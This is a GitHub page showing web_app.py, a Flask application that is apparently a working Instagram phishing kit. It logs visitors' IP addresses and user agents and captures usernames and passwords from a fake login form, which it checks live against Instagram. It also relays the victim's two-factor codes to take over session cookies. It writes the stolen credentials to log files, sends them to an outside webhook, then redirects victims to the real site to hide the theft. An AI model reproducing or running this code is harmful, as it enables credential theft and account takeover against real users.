-
Notifications
You must be signed in to change notification settings - Fork 5
/
Copy pathweb_app.py
155 lines (131 loc) · 5.94 KB
/
web_app.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
import pytz
import datetime
import time
import logging
from flask import Flask, render_template, request, redirect
from app.instagram_api import IsExists,two_factor
from app.functions import edit_cookies, first_art, correct_all, wrong_answer, twoFA_active,twoFA_correct, send_webhook_message
from colorama import Fore, Style
import concurrent.futures
app = Flask(__name__)
username = None
password = None
user_agent = None
two_factor_identifier = None
method = None
params = None
@app.route('/')
def index():
global user_agent,params
user_ip = request.headers.get('X-Forwarded-For', request.remote_addr)
user_agent = request.headers.get('User-Agent')
time_zone = time.tzname[0]
utc_now = datetime.datetime.now(datetime.timezone.utc)
try:
if time_zone.startswith(("+", "-")) or time_zone.isdigit():
offset_hours = int(time_zone.replace("+", "").replace("-", ""))
user_tz = pytz.FixedOffset(offset_hours * 60)
else:
user_tz = pytz.timezone(time_zone)
user_now = utc_now.astimezone(user_tz)
visit_time = user_now.strftime("%Y-%m-%d %H:%M:%S")
except pytz.UnknownTimeZoneError:
print("Geçersiz saat dilimi:", time_zone)
user_tz = pytz.utc
visit_time = utc_now.strftime("%Y-%m-%d %H:%M:%S")
if user_agent is not None:
first_art(visit_time, user_ip.strip(), user_agent)
with open('output/ip_agent.log', 'a') as f:
f.write(f"\n\n\n\nEnter website in: {visit_time} \nIP: {user_ip}\nUser-Agent: {user_agent}\n")
params = {
"display_type": "none"
}
return render_template('index.html',params=params)
@app.route('/submit', methods=['POST'])
def submit():
global username, password, user_agent, two_factor_identifier, method,params
username = request.form['username']
password = request.form['password']
user_agent = request.headers.get('User-Agent')
result, cookies = IsExists(username, password, user_agent)
if result and result.get("status") == "ok" and result.get("authenticated") is not None and result.get("authenticated"):
cookies = edit_cookies(cookies)
correct_all(username, password, cookies)
with open('output/correct_pass_user.log', 'a') as f:
f.write(f"\nUsername: {username}\nPassword: {password}\n{cookies}\n")
message = "Username: " + username + "\nPassword: " + password + "\n\n" + "\t\tCookies\n" + cookies
with concurrent.futures.ThreadPoolExecutor() as executor:
future = executor.submit(send_webhook_message, message)
result = future.result()
return redirect("https://www.instagram.com")
elif result.get("two_factor_required"):
two_factor_identifier = result.get("two_factor_info", {}).get("two_factor_identifier")
if result.get("two_factor_info", {}).get("sms_two_factor_on"):
phone_number = result.get("two_factor_info", {}).get("obfuscated_phone_number")
method = 1
params = {
"method_message": f"Enter the code we sent to your number ending in {phone_number}.",
"backup_message": "If you're unable to receive a security code, use one of your",
"display_type": "none"
}
elif result.get("two_factor_info", {}).get("whatsapp_two_factor_on"):
method = 2
params = {
"method_message": "Enter a login code generated by a whatsapp.",
"backup_message": "If you're unable to receive a security code, use one of your",
"display_type": "none"
}
elif result.get("two_factor_info", {}).get("totp_two_factor_on"):
method = 3
params = {
"method_message": "Enter a 6-digit login code generated by an authentication app.",
"backup_message": "If you're unable to receive a login code from an authentication app, you can use one of your",
"display_type": "none"
}
with open('output/correct_pass_user.log', 'a') as f:
f.write(f"\nUsername: {username}\nPassword: {password}")
twoFA_active(username,password)
return redirect("/twoFA")
else:#ERROR
wrong_answer(username, password)
with open('output/wrong_pass.log', 'a') as f:
f.write(f"\nUsername: {username}\nPassword: {password}\n")
params = {
"display_type": "block"
}
return render_template('/index.html',params=params)
@app.route('/twoFA', methods=['GET', 'POST'])
def twoFA():
global username, password, user_agent, two_factor_identifier,method,params
if request.method == 'POST':
code = request.form['code']
result,cookies = two_factor(code,two_factor_identifier,username,user_agent,method)
if result.get("authenticated") is not None and result.get("authenticated"):
cookies = edit_cookies(cookies)
message = "Username: " + username + "\nPassword: " + password + "\n\n" + "\t\tCookies\n" + cookies
twoFA_correct(cookies)
with open('output/correct_pass_user.log', 'a') as f:
f.write(f"{cookies}\n")
with concurrent.futures.ThreadPoolExecutor() as executor:
executor.submit(send_webhook_message, message)
else:
params.update({
"display_type": "block"
})
return render_template('/twoFA.html',params=params)
else:
params.update({
"display_type": "none"
})
return render_template('twoFA.html',params=params)
return redirect("https://www.instagram.com")
if __name__ == '__main__':
try:
log = logging.getLogger('werkzeug')
log.disabled = True
logging.disable(logging.CRITICAL)
host = '0.0.0.0'
port = 8080
app.run(host=host, port=port)
except:
print(Fore.RED + "EXIT" + Style.RESET_ALL)